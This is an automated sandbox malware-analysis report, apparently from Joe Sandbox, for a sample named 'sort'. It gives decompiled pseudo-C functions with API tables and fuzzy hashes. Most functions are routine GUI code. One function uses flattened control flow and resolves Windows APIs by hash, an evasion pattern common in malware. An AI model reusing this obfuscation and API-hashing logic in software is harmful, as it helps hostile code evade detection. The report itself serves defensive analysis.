                                            						if(GetKeyState(_t243) < 0) {
                                            							L25:
                                            							return 0;
                                            						} else {
                                            							goto L6;
                                            						}
                                            					}
                                            				}
                                            				_push(_a8);
                                            				if(PtInRect( &_v44, _a4.x) == 0) {
                                            					goto L25;
                                            				}
                                            				_t206 = GetSystemMetrics(6);
                                            				_v20 = _t206;
                                            				_t245 = GetSystemMetrics(5);
                                            				_v112.top = _v44.top;
                                            				_v112.left = _v44.left;
                                            				_v112.bottom = _v44.bottom;
                                            				_v112.right = _v44.right;
                                            				_push( &_v112);
                                            				E00422D9C(0);
                                            				CopyRect( &_v60,  &_v112);
                                            				_push(_a8);
                                            				if(PtInRect( &_v60, _a4.x) != 0) {
                                            					_push(1);
                                            					L61:
                                            					_pop(_t144);
                                            					return _t144;
                                            				}
                                            				if((_v8 & 0x00040600) == 0) {
                                            					L56:
                                            					_t141 =  *0x439c9c; // 0x0
                                            					_push(_a8);
                                            					_v44.bottom = _t206 + _t141 + _v44.top;
                                            					if(PtInRect( &_v44, _a4.x) == 0) {
                                            						_push(0xfffffffe);
                                            						goto L61;
                                            					}
                                            					_t145 =  *0x439c98; // 0x0
                                            					if(_a4.x >= _t145 + _v44.left - 2 || (_v6 & 0x00000008) == 0) {
                                            						L54:
                                            						_push(2);
                                            					} else {
                                            						_push(3);
                                            					}
                                            					goto L61;
                                            				}
                                            				_t246 = _v12;
                                            				_t148 =  *0x439c98; // 0x0
                                            				_t150 = _t148 - _t245 + _t245 * 2 + _v28;
                                            				_t219 = _t246 - _t206 + _t206 +  *0x439c9c;
                                            				if(_a8 >= _v44.top + _t246) {
                                            					_t238 = _v44.bottom;
                                            					if(_a8 < _t238 - _t246) {
                                            						_t151 = _v28;
                                            						if(_a4.x >= _v44.left + _t151) {
                                            							if(_a4.x < _v44.right - _t151) {
                                            								InflateRect( &_v44,  ~_t151,  ~_v12);
                                            								_t206 = _v20;
                                            								goto L56;
                                            							}
                                            							if((_v7 & 0x00000002) == 0) {
                                            								if(_a8 > _v44.top + _t219) {
                                            									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xb;
                                            								} else {
                                            									_push(0xe);
                                            									goto L51;
                                            								}
                                            							} else {
                                            								_push(0xb);
                                            								goto L51;
                                            							}
                                            						} else {
                                            							if((_v7 & 0x00000002) == 0) {
                                            								if(_a8 <= _v44.top + _t219) {
                                            									goto L33;
                                            								} else {
                                            									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xa;
                                            								}
                                            							} else {
                                            								_push(0xa);
                                            								goto L51;
                                            							}
                                            						}
                                            					} else {
                                            						if((_v7 & 0x00000002) == 0) {
                                            							if(_a4.x > _v44.left + _t150) {
                                            								_t161 = ((0 | _a4.x - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xf;
                                            							} else {
                                            								_push(0x10);
                                            								goto L51;
                                            							}
                                            						} else {
                                            							_push(0xf);
                                            							goto L51;
                                            						}
                                            					}
                                            				} else {
                                            					if((_v7 & 0x00000002) == 0) {
                                            						if(_a4.x > _v44.left + _t150) {
                                            							_t161 = ((0 | _a4 - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xc;
                                            						} else {
                                            							L33:
                                            							_push(0xd);
                                            							goto L51;
                                            						}
                                            					} else {
                                            						_push(0xc);
                                            						L51:
                                            						_pop(_t161);
                                            					}
                                            				}
                                            				if((_v7 & 0x00000008) != 0) {
                                            					goto L54;
                                            				}
                                            				return _t161;
                                            			}

                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetWindowRect.USER32 ref: 00422E1F
                                            • GetSystemMetrics.USER32 ref: 00422E2D
                                            • GetSystemMetrics.USER32 ref: 00422E36
                                            • GetKeyState.USER32(00000002), ref: 00422E6B
                                            • InflateRect.USER32(?,?,00000000), ref: 00422EA3
                                            • PtInRect.USER32(?,?,?), ref: 00422F27
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$MetricsSystemWindow$InflateLongState
                                            • String ID:
                                            • API String ID: 90034188-0
                                            • Opcode ID: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
                                            • Instruction ID: 3d4fded11727fa72cddd390d452a0739f578755c9cf4983628836b576b503de4
                                            • Opcode Fuzzy Hash: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
                                            • Instruction Fuzzy Hash: F4A1D931B00229ABDF14CFA8D945BEE77B1EF08355F55802BE902E7244D7BC9A81DB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00411E32(intOrPtr* __ecx) {
                                            				intOrPtr _t81;
                                            				intOrPtr _t90;
                                            				struct HWND__* _t91;
                                            				intOrPtr* _t142;
                                            				intOrPtr* _t145;
                                            				void* _t147;
                                            				void* _t149;
                                            
                                            				_t118 = __ecx;
                                            				E00406520(E00429CDC, _t147);
                                            				_t145 = __ecx;
                                            				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x34;
                                            				 *((intOrPtr*)(_t147 - 0x24)) = __ecx;
                                            				if( *(_t147 + 0x10) == 0) {
                                            					 *(_t147 + 0x10) =  *(E00424BFB() + 8);
                                            				}
                                            				_t142 =  *((intOrPtr*)(E00424BFB() + 0x1038));
                                            				 *((intOrPtr*)(_t147 - 0x28)) = _t142;
                                            				 *(_t147 - 0x14) = 0;
                                            				 *(_t147 - 0x18) = 0;
                                            				 *(_t147 - 4) = 0;
                                            				E0041615D(_t118, 0x10);
                                            				E0041615D(_t118, 0x3c000);
                                            				if(_t142 == 0) {
                                            					L5:
                                            					if( *(_t147 + 8) == 0) {
                                            						L31:
                                            						L33:
                                            						 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
                                            						return 0;
                                            					}
                                            					_t81 =  *0x436980; // 0x436994
                                            					 *((intOrPtr*)(_t147 - 0x1c)) = _t81;
                                            					 *(_t147 - 4) = 1;
                                            					 *((intOrPtr*)(_t147 - 0x20)) = 0;
                                            					if((0 | E00416F5E( *(_t147 + 8), _t147 - 0x1c, _t147 - 0x20) == 0x00000000) != 0) {
                                            						L13:
                                            						E00416DAD(_t147 - 0x40,  *(_t147 + 8));
                                            						 *(_t147 - 4) = 2;
                                            						E004170E7(_t147 - 0x40,  *((intOrPtr*)(_t147 - 0x20)));
                                            						 *(_t147 - 0x14) = E00416E4A(_t147 - 0x40);
                                            						 *(_t147 - 4) = 1;
                                            						E00416E3C(_t147 - 0x40);
                                            						if( *(_t147 - 0x14) != 0) {
                                            							 *(_t147 + 8) = GlobalLock( *(_t147 - 0x14));
                                            						}
                                            						L15:
                                            						 *(_t145 + 0x2c) =  *(_t145 + 0x2c) | 0xffffffff;
                                            						 *(_t145 + 0x24) =  *(_t145 + 0x24) | 0x00000010;
                                            						_push(_t145);
                                            						"VWh\rDB"();
                                            						_t90 =  *((intOrPtr*)(_t147 + 0xc));
                                            						if(_t90 != 0) {
                                            							_t91 =  *(_t90 + 0x1c);
                                            						} else {
                                            							_t91 = 0;
                                            						}
                                            						 *(_t147 - 0x18) = CreateDialogIndirectParamA( *(_t147 + 0x10),  *(_t147 + 8), _t91, E00411B77, 0);
                                            						 *(_t147 - 4) = 0;
                                            						E00416AEC(_t147 - 0x1c);
                                            						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
                                            						if(_t142 != 0) {
                                            							 *((intOrPtr*)( *_t142 + 0x14))(_t147 - 0x34);
                                            							if( *(_t147 - 0x18) != 0) {
                                            								 *((intOrPtr*)( *_t145 + 0xb4))(0);
                                            							}
                                            						}
                                            						if(E00413C3E() == 0) {
                                            							 *((intOrPtr*)( *_t145 + 0xa4))();
                                            						}
                                            						if( *(_t147 - 0x18) != 0 && ( *(_t145 + 0x24) & 0x00000010) == 0) {
                                            							DestroyWindow( *(_t147 - 0x18));
                                            							 *(_t147 - 0x18) = 0;
                                            						}
                                            						if( *(_t147 - 0x14) != 0) {
                                            							GlobalUnlock( *(_t147 - 0x14));
                                            							GlobalFree( *(_t147 - 0x14));
                                            						}
                                            						if( *(_t147 - 0x18) != 0 || ( *(_t145 + 0x24) & 0x00000010) == 0) {
                                            							_push(1);
                                            							_pop(0);
                                            							goto L33;
                                            						} else {
                                            							goto L31;
                                            						}
                                            					}
                                            					if(GetSystemMetrics(0x2a) == 0 || E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Shell Dlg") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Sans Serif") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), ?str?) != 0) {
                                            						goto L15;
                                            					} else {
                                            						if( *((short*)(_t147 - 0x20)) == 8) {
                                            							 *((intOrPtr*)(_t147 - 0x20)) = 0;
                                            						}
                                            						goto L13;
                                            					}
                                            				}
                                            				_push(_t147 - 0x34);
                                            				if( *((intOrPtr*)( *_t145 + 0xb4))() == 0) {
                                            					goto L31;
                                            				}
                                            				 *(_t147 + 8) =  *((intOrPtr*)( *_t142 + 0x10))(_t147 - 0x34,  *(_t147 + 8));
                                            				goto L5;
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00411E37
                                            • GetSystemMetrics.USER32 ref: 00411EE9
                                            • GlobalLock.KERNEL32 ref: 00411F73
                                            • CreateDialogIndirectParamA.USER32(?,?,?,00411B77,00000000), ref: 00411FA5
                                              • Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00
                                            • DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0041201C
                                            • GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0041202D
                                            • GlobalFree.KERNEL32 ref: 00412036
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
                                            • String ID: Helv$MS Sans Serif$MS Shell Dlg
                                            • API String ID: 2343056566-2894235370
                                            • Opcode ID: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
                                            • Instruction ID: aadedd96d0c9695131ff4cccacd717b3f0d87f33b0c70c2cb72ca24c31ea773e
                                            • Opcode Fuzzy Hash: b92bef3789bdaf7cf45641bf13bee934e354941852864a1178ecb765b367d6cf
                                            • Instruction Fuzzy Hash: 5A617131A0025ADFCF14EFA5D985AEEBBB1FF08304F10452FF505A62A1D7789A81CB59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 69%
                                            			E02279FA0(char* __ecx, intOrPtr __edx) {
                                            				char _v524;
                                            				char _v1044;
                                            				intOrPtr _v1052;
                                            				char _v1056;
                                            				char _v1060;
                                            				char _v1064;
                                            				intOrPtr* _v1068;
                                            				intOrPtr _v1072;
                                            				char* _v1076;
                                            				intOrPtr _v1080;
                                            				intOrPtr* _v1084;
                                            				intOrPtr _v1088;
                                            				intOrPtr _v1092;
                                            				intOrPtr _v1108;
                                            				intOrPtr _v1112;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t39;
                                            				signed int _t40;
                                            				intOrPtr* _t43;
                                            				signed int _t46;
                                            				intOrPtr* _t49;
                                            				intOrPtr* _t51;
                                            				intOrPtr* _t56;
                                            				intOrPtr* _t58;
                                            				intOrPtr* _t62;
                                            				intOrPtr* _t64;
                                            				intOrPtr* _t65;
                                            				intOrPtr* _t69;
                                            				intOrPtr _t73;
                                            				intOrPtr* _t74;
                                            				intOrPtr* _t78;
                                            				signed int _t79;
                                            				signed int _t85;
                                            				intOrPtr* _t97;
                                            				intOrPtr _t98;
                                            				char* _t99;
                                            				intOrPtr _t100;
                                            				intOrPtr _t134;
                                            				intOrPtr* _t144;
                                            				void* _t146;
                                            				intOrPtr _t147;
                                            				void* _t148;
                                            				intOrPtr _t149;
                                            				intOrPtr _t150;
                                            				intOrPtr _t151;
                                            				char* _t152;
                                            				void* _t153;
                                            				char _t155;
                                            				intOrPtr _t156;
                                            				void* _t157;
                                            				void* _t158;
                                            				void* _t159;
                                            
                                            				_t99 = __ecx;
                                            				_t157 =  &_v1084;
                                            				_v1080 = __edx;
                                            				_v1076 = __ecx;
                                            				_t39 = 0x1a29c84b;
                                            				while(1) {
                                            					L1:
                                            					_t97 = _v1068;
                                            					while(1) {
                                            						_t155 = _v1064;
                                            						do {
                                            							while(1) {
                                            								L3:
                                            								_t158 = _t39 - 0x1bec2acf;
                                            								if(_t158 > 0) {
                                            									break;
                                            								}
                                            								if(_t158 == 0) {
                                            									_t56 =  *0x227dea8;
                                            									__eflags = _t56;
                                            									if(_t56 == 0) {
                                            										_t99 = E02273F20(0xbb398380);
                                            										_t56 = E02273E80(_t97, _t99, 0x97f883e, _t155);
                                            										 *0x227dea8 = _t56;
                                            									}
                                            									_t146 =  *_t56();
                                            									_t58 =  *0x227e1a0;
                                            									__eflags = _t58;
                                            									if(_t58 == 0) {
                                            										_t99 = E02273F20(0xbb398380);
                                            										_t58 = E02273E80(_t97, _t99, 0x26c3f343, _t155);
                                            										 *0x227e1a0 = _t58;
                                            									}
                                            									 *_t58(_t146, 0, _t97);
                                            									_t147 = _v1088;
                                            									_t39 = 0x1dedf83c;
                                            									continue;
                                            								} else {
                                            									_t159 = _t39 - 0x191840a9;
                                            									if(_t159 > 0) {
                                            										__eflags = _t39 - 0x1a29c84b;
                                            										if(_t39 == 0x1a29c84b) {
                                            											_t62 =  *0x227dea8;
                                            											__eflags = _t62;
                                            											if(_t62 == 0) {
                                            												_t99 = E02273F20(0xbb398380);
                                            												_t62 = E02273E80(_t97, _t99, 0x97f883e, _t155);
                                            												 *0x227dea8 = _t62;
                                            											}
                                            											_t148 =  *_t62();
                                            											_t64 =  *0x227dcec;
                                            											__eflags = _t64;
                                            											if(_t64 == 0) {
                                            												_t99 = E02273F20(0xbb398380);
                                            												_t64 = E02273E80(_t97, _t99, 0xe9233692, _t155);
                                            												 *0x227dcec = _t64;
                                            											}
                                            											_t65 =  *_t64(_t148, 8, 0x48);
                                            											_v1084 = _t65;
                                            											__eflags = _t65;
                                            											if(_t65 == 0) {
                                            												return _t65;
                                            											} else {
                                            												_t147 = _v1088;
                                            												_t39 = 0x1fc710ef;
                                            												continue;
                                            											}
                                            										} else {
                                            											__eflags = _t39 - 0x1a44b2a5;
                                            											if(_t39 != 0x1a44b2a5) {
                                            												goto L45;
                                            											} else {
                                            												_t152 = E022734C0(0x227da50);
                                            												_t69 =  *0x227dc60;
                                            												__eflags = _t69;
                                            												if(_t69 == 0) {
                                            													_t69 = E02273E80(_t97, E02273F20(0xe66945e6), 0xcca28b0d, _t155);
                                            													 *0x227dc60 = _t69;
                                            												}
                                            												 *_t69( &_v1044, 0x104, _t152,  &_v524, _t97);
                                            												_t157 = _t157 + 0x14;
                                            												_t99 = _t152;
                                            												E02273460(_t99);
                                            												_t147 = _v1076;
                                            												_t39 = 0x10f8a433;
                                            												continue;
                                            											}
                                            										}
                                            									} else {
                                            										if(_t159 == 0) {
                                            											_t100 = _v1072;
                                            											 *((intOrPtr*)(_t100 + 0x24)) = _t147;
                                            											_t73 =  *0x227e2dc; // 0x0
                                            											 *((intOrPtr*)(_t100 + 0x20)) = _t73;
                                            											 *0x227e2dc = _t100;
                                            											return _t73;
                                            										} else {
                                            											if(_t39 == 0xa70e03e) {
                                            												_t74 =  *0x227dc70;
                                            												__eflags = _t74;
                                            												if(_t74 == 0) {
                                            													_t99 = E02273F20(0xbb398380);
                                            													_t74 = E02273E80(_t97, _t99, 0x560d239b, _t155);
                                            													 *0x227dc70 = _t74;
                                            												}
                                            												 *_t74(_v1056);
                                            												_t39 = 0x191840a9;
                                            												continue;
                                            											} else {
                                            												if(_t39 == 0x10f8a433) {
                                            													_push(0);
                                            													_push(_t99);
                                            													_t99 = 0;
                                            													E02274BA0(_t97, 0,  &_v1044, _t155, 1);
                                            													_t157 = _t157 + 0xc;
                                            													_t39 = 0x1bec2acf;
                                            													continue;
                                            												} else {
                                            													if(_t39 != 0x18d473c5) {
                                            														goto L45;
                                            													} else {
                                            														_t149 =  *0x227e2ec; // 0x4d9470
                                            														_t78 =  *0x227e024;
                                            														_t150 = _t149 + 0x278;
                                            														_v1052 = _t150;
                                            														if(_t78 == 0) {
                                            															_t99 = E02273F20(0xbb398380);
                                            															_t78 = E02273E80(_t97, _t99, 0x5262aefc, _t155);
                                            															 *0x227e024 = _t78;
                                            														}
                                            														_t79 =  *_t78(_t150);
                                            														_t151 =  *0x227ded0;
                                            														_v1052 = 2 + _t79 * 2;
                                            														if(_t151 == 0) {
                                            															_t99 = E02273F20(0xbb398380);
                                            															_t151 = E02273E80(_t97, _t99, 0x23563937, _t155);
                                            															 *0x227ded0 = _t151;
                                            														}
                                            														_t156 = _t151;
                                            														if(_t151 == 0) {
                                            															_t99 = E02273F20(0xbb398380);
                                            															_t151 = E02273E80(_t97, _t99, 0x23563937, _t156);
                                            															 *0x227ded0 = _t151;
                                            														}
                                            														_t98 = _t151;
                                            														if(_t151 == 0) {
                                            															_t99 = E02273F20(0xbb398380);
                                            															 *0x227ded0 = E02273E80(_t98, _t99, 0x23563937, _t156);
                                            														}
                                            														_t144 =  *0x227dce8; // 0x0
                                            														if(_t144 == 0) {
                                            															_t99 = E02273F20(0xbb398380);
                                            															_t144 = E02273E80(_t98, _t99, 0xb310a228, _t156);
                                            															 *0x227dce8 = _t144;
                                            														}
                                            														_t85 =  *_t144(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_v1060, 0x100000, 1, 0);
                                            														_t147 = _v1108;
                                            														_t134 = _v1112;
                                            														asm("sbb eax, eax");
                                            														_t39 = ( ~_t85 & 0x069deb97) + 0x1f9eb481;
                                            														goto L1;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									}
                                            								}
                                            								L60:
                                            							}
                                            							__eflags = _t39 - 0x1fc710ef;
                                            							if(__eflags > 0) {
                                            								__eflags = _t39 - 0x263ca018;
                                            								if(_t39 == 0x263ca018) {
                                            									_t99 =  &_v1056;
                                            									_t40 = E0227B3A0(_t99,  &_v1064);
                                            									asm("sbb eax, eax");
                                            									_t39 = ( ~_t40 & 0x28f9ad68) + 0xa70e03e;
                                            									_t155 = _v1064;
                                            									goto L3;
                                            								} else {
                                            									__eflags = _t39 - 0x336a8da6;
                                            									if(_t39 != 0x336a8da6) {
                                            										goto L45;
                                            									} else {
                                            										_t99 = _t155;
                                            										_t43 = E02271140(_v1060);
                                            										_t134 = _v1080;
                                            										_t97 = _t43;
                                            										__eflags = _t97;
                                            										_v1068 = _t97;
                                            										_t39 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
                                            										goto L3;
                                            									}
                                            								}
                                            							} else {
                                            								if(__eflags == 0) {
                                            									_t99 = _t147;
                                            									_t46 = E0227AB50(_t99, _t134,  &_v524);
                                            									_t134 = _v1080;
                                            									_t157 = _t157 + 4;
                                            									asm("sbb eax, eax");
                                            									_t39 = ( ~_t46 & 0xf935bf44) + 0x1f9eb481;
                                            									goto L3;
                                            								} else {
                                            									__eflags = _t39 - 0x1dedf83c;
                                            									if(_t39 == 0x1dedf83c) {
                                            										_t49 =  *0x227dea8;
                                            										__eflags = _t49;
                                            										if(_t49 == 0) {
                                            											_t99 = E02273F20(0xbb398380);
                                            											_t49 = E02273E80(_t97, _t99, 0x97f883e, _t155);
                                            											 *0x227dea8 = _t49;
                                            										}
                                            										_t153 =  *_t49();
                                            										_t51 =  *0x227e1a0;
                                            										__eflags = _t51;
                                            										if(_t51 == 0) {
                                            											_t99 = E02273F20(0xbb398380);
                                            											_t51 = E02273E80(_t97, _t99, 0x26c3f343, _t155);
                                            											 *0x227e1a0 = _t51;
                                            										}
                                            										 *_t51(_t153, 0, _t155);
                                            										_t147 = _v1088;
                                            										_t39 = 0xa70e03e;
                                            										_t134 = _v1092;
                                            										goto L3;
                                            									} else {
                                            										__eflags = _t39 - 0x1f9eb481;
                                            										if(_t39 == 0x1f9eb481) {
                                            											return E02274250(_t97, _v1072);
                                            										}
                                            										goto L45;
                                            									}
                                            								}
                                            							}
                                            							goto L60;
                                            							L45:
                                            							__eflags = _t39 - 0x1c40b504;
                                            						} while (_t39 != 0x1c40b504);
                                            						return _t39;
                                            						goto L60;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 0227A0FB
                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0227A0FE
                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0227A101
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CurrentProcess
                                            • String ID: 79V#$79V#$79V#$>p$>p$Ei
                                            • API String ID: 2050909247-1771473519
                                            • Opcode ID: 55b299126aa161881efe7b4188e1bf3016a433c468dc1c1704971d2bb4b37640
                                            • Instruction ID: 9446f566a317bad02e6a75d5a657cfff71d8cdaefdb0e04edefc1b0661e474a6
                                            • Opcode Fuzzy Hash: 55b299126aa161881efe7b4188e1bf3016a433c468dc1c1704971d2bb4b37640
                                            • Instruction Fuzzy Hash: 94A1DE71B6C3029BCB14EAF8A89462F32E6ABC4694F540869F445DB348EF74DC058BD3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 65%
                                            			E0041D196(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
                                            				struct tagRECT _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				struct tagRECT _v44;
                                            				char _v304;
                                            				void* __ebp;
                                            				int _t69;
                                            				signed char _t72;
                                            				signed char _t77;
                                            				signed int _t82;
                                            				signed int _t84;
                                            				void* _t90;
                                            				struct HWND__* _t94;
                                            				intOrPtr _t122;
                                            				intOrPtr _t130;
                                            				void* _t142;
                                            				signed char _t143;
                                            				signed char _t145;
                                            				intOrPtr _t147;
                                            				void* _t149;
                                            
                                            				_t142 = __edx;
                                            				_t147 = _a4;
                                            				_t122 = __ecx;
                                            				_t69 = GetWindowRect( *(_t147 + 0x1c),  &_v44);
                                            				if( *((intOrPtr*)(_t147 + 0x70)) != _t122) {
                                            					_t143 = 0;
                                            					__eflags = 0;
                                            					L5:
                                            					if( *((intOrPtr*)(_t122 + 0x78)) != _t143 && ( *(_t147 + 0x68) & 0x00000040) != 0) {
                                            						 *(_t122 + 0x64) =  *(_t122 + 0x64) | 0x00000040;
                                            					}
                                            					 *(_t122 + 0x64) =  *(_t122 + 0x64) & 0xfffffff9;
                                            					_t72 =  *(_t147 + 0x64) & 0x00000006 |  *(_t122 + 0x64);
                                            					 *(_t122 + 0x64) = _t72;
                                            					if((_t72 & 0x00000040) == 0) {
                                            						E004165E5(_t147,  &_v304, 0x104);
                                            						E0041A843( *(_t122 + 0x1c),  &_v304);
                                            					}
                                            					_t77 = ( *(_t122 + 0x64) ^  *(_t147 + 0x64)) & 0x0000f000 ^  *(_t147 + 0x64) | 0x0000000f;
                                            					if( *((intOrPtr*)(_t122 + 0x78)) == _t143) {
                                            						_t78 = _t77 & 0x000000fe;
                                            						__eflags = _t77 & 0x000000fe;
                                            					} else {
                                            						_t78 = _t77 | 0x00000001;
                                            					}
                                            					E004263C3(_t147, _t78);
                                            					_v28 = _t143;
                                            					if( *((intOrPtr*)(_t147 + 0x70)) != _t122 && IsWindowVisible( *(_t147 + 0x1c)) != 0) {
                                            						E0041663D(_t147, _t143, _t143, _t143, _t143, _t143, 0x97);
                                            						_v28 = 1;
                                            					}
                                            					_v24 = _v24 | 0xffffffff;
                                            					if(_a8 == _t143) {
                                            						_t144 = _t122 + 0x7c;
                                            						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t122 + 0x84)), _t147);
                                            						E0041158A(_t122 + 0x7c,  *((intOrPtr*)(_t144 + 8)), 0);
                                            						_t82 =  *0x439bf4; // 0x2
                                            						_t145 = 0;
                                            						__eflags = 0;
                                            						_t84 =  *0x439bf0; // 0x2
                                            						E0041663D(_t147, 0,  ~_t84,  ~_t82, 0, 0, 0x115);
                                            					} else {
                                            						CopyRect( &_v20, _a8);
                                            						E0041A2F1(_t122,  &_v20);
                                            						asm("cdq");
                                            						_t40 =  &(_v20.bottom); // 0x50402834
                                            						asm("cdq");
                                            						_push(( *_t40 - _v20.top - _t142 >> 1) + _v20.top);
                                            						_push((_v20.right - _v20.left - _t142 >> 1) + _v20.left);
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_push(_a4);
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_v24 = E0041DD44(_t122);
                                            						_t46 =  &(_v20.bottom); // 0x50402834
                                            						E0041663D(_a4, 0, _v20.left, _v20.top, _v20.right - _v20.left,  *_t46 - _v20.top, 0x114);
                                            						_t147 = _a4;
                                            						_t145 = 0;
                                            					}
                                            					if(E00413740(_t149, GetParent( *(_t147 + 0x1c))) != _t122) {
                                            						if(_t122 != _t145) {
                                            							_t94 =  *(_t122 + 0x1c);
                                            						} else {
                                            							_t94 = 0;
                                            						}
                                            						E00413740(_t149, SetParent( *(_t147 + 0x1c), _t94));
                                            					}
                                            					_t130 =  *((intOrPtr*)(_t147 + 0x70));
                                            					_t165 = _t130 - _t122;
                                            					if(_t130 != _t122) {
                                            						__eflags = _t130 - _t145;
                                            						if(_t130 == _t145) {
                                            							goto L33;
                                            						}
                                            						__eflags =  *((intOrPtr*)(_t122 + 0x78)) - _t145;
                                            						if( *((intOrPtr*)(_t122 + 0x78)) == _t145) {
                                            							L30:
                                            							__eflags = 0;
                                            							L31:
                                            							_push(0);
                                            							_push(0xffffffff);
                                            							goto L32;
                                            						}
                                            						__eflags =  *((intOrPtr*)(_t130 + 0x78)) - _t145;
                                            						if(__eflags != 0) {
                                            							goto L30;
                                            						}
                                            						_push(1);
                                            						_pop(0);
                                            						goto L31;
                                            					} else {
                                            						_push(_t145);
                                            						_push(_v24);
                                            						L32:
                                            						_push(_t147);
                                            						E0041D609(_t130, _t165);
                                            						L33:
                                            						_t166 = _v28 - _t145;
                                            						 *((intOrPtr*)(_t147 + 0x70)) = _t122;
                                            						if(_v28 != _t145) {
                                            							E0041663D(_t147, _t145, _t145, _t145, _t145, _t145, 0x57);
                                            						}
                                            						E0041D5A8(_t122, _t147);
                                            						_t90 = E004225AA(_t122, _t166);
                                            						 *(_t90 + 0xb8) =  *(_t90 + 0xb8) | 0x0000000c;
                                            						return _t90;
                                            					}
                                            				}
                                            				_t143 = 0;
                                            				if(_a8 != 0) {
                                            					_t69 = EqualRect( &_v44, _a8);
                                            					if(_t69 == 0) {
                                            						goto L5;
                                            					}
                                            				}
                                            				return _t69;
                                            			}

                                            APIs
                                            • GetWindowRect.USER32 ref: 0041D1AE
                                            • EqualRect.USER32 ref: 0041D1CB
                                              • Part of subcall function 0041663D: SetWindowPos.USER32(?,?,?,?,?,?,00000000,?,00412218,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00416664
                                            • IsWindowVisible.USER32(?), ref: 0041D254
                                            • CopyRect.USER32 ref: 0041D286
                                            • GetParent.USER32(?), ref: 0041D338
                                            • SetParent.USER32(?,0000E800,00000000), ref: 0041D357
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: RectWindow$Parent$CopyEqualVisible
                                            • String ID: 4(@P$@$@m7@
                                            • API String ID: 3103310903-421610842
